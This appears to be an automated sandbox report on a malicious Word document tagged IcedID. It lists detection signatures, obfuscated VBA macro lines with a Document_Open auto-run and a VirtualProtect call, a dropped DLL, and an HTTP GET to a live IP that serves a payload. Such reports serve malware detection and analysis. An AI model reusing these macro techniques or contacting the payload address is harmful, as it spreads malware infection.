Windows Analysis Report
airequipmentcorp-doc-08.11.2022.doc

Overview

General Information

Sample Name: airequipmentcorp-doc-08.11.2022.doc
Analysis ID: 682577
MD5: 84904f679048e45c43210c22f8fcc5df
SHA1: 7e23ee02e2543e51a2ad97b2ede96c441d34e6eb
SHA256: 78c296d80214d887820a3c55bc06fbc42b17db90fb01aef0766365b383f1e7f1
Tags: docIcedID
Infos:

Detection

Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro with suspicious strings
Machine Learning detection for sample
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: airequipmentcorp-doc-08.11.2022.doc Virustotal: Detection: 24% Perma Link
Source: airequipmentcorp-doc-08.11.2022.doc ReversingLabs: Detection: 15%
Machine Learning detection for sample
Source: airequipmentcorp-doc-08.11.2022.doc Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities
barindex
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\y71DC.tmp.dll Jump to behavior
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.8.146.139Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 45.8.146.139 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknown TCP traffic detected without corresponding DNS query: 45.8.146.139
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{069BE2E5-12F7-4D27-9A4E-5965ED9E85B5}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.8.146.139Connection: Keep-Alive

System Summary
barindex
Document contains an embedded VBA macro with suspicious strings
Source: airequipmentcorp-doc-08.11.2022.doc OLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: airequipmentcorp-doc-08.11.2022.doc OLE, VBA macro line: Set = CallByName((ufVM1s65i("AzhECiJUk2")), ufVM1s65i("bYZwWl"), VbGet, ufVM1s65i("cR3qp4Grta"))
Source: airequipmentcorp-doc-08.11.2022.doc OLE, VBA macro line: Set = CallByName((), ufVM1s65i("QaSy54aHeh"), VbGet, )
Source: airequipmentcorp-doc-08.11.2022.doc OLE, VBA macro line: Set = CallByName((), ufVM1s65i("NZpkQxhY7T"), VbGet, )
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: airequipmentcorp-doc-08.11.2022.doc OLE, VBA macro line: Private Sub Document_Open()
Document contains embedded VBA macros
Source: airequipmentcorp-doc-08.11.2022.doc OLE indicator, VBA macros: true
Source: airequipmentcorp-doc-08.11.2022.doc Virustotal: Detection: 24%
Source: airequipmentcorp-doc-08.11.2022.doc ReversingLabs: Detection: 15%
Source: airequipmentcorp-doc-08.11.2022.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\airequipmentcorp-doc-08.11.2022.doc
Source: airequipmentcorp-doc-08.11.2022.doc OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$requipmentcorp-doc-08.11.2022.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR5C81.tmp Jump to behavior
Source: classification engine Classification label: mal64.expl.winDOC@1/6@0/1
Source: airequipmentcorp-doc-08.11.2022.doc OLE document summary: title field not present or empty
Source: airequipmentcorp-doc-08.11.2022.doc OLE document summary: author field not present or empty
Source: airequipmentcorp-doc-08.11.2022.doc OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: airequipmentcorp-doc-08.11.2022.doc Initial sample: OLE zip file path = docProps/custom.xml
Source: airequipmentcorp-doc-08.11.2022.doc Static file information: File size 2297841 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 682577 Sample: airequipmentcorp-doc-08.11.... Startdate: 11/08/2022 Architecture: WINDOWS Score: 64 14 Multi AV Scanner detection for submitted file 2->14 16 Machine Learning detection for sample 2->16 18 Document contains an embedded VBA macro with suspicious strings 2->18 5 WINWORD.EXE 18 36 2->5         started        process3 dnsIp4 12 45.8.146.139, 49171, 80 VMAGE-ASRU Russian Federation 5->12 10 C:\Users\user\AppData\Local\...\y71DC.tmp.dll, HTML 5->10 dropped 20 Document exploit detected (creates forbidden files) 5->20 file5 signatures6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.8.146.139
 unknown Russian Federation
44676 VMAGE-ASRU false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm false
  • Avira URL Cloud: safe
 unknown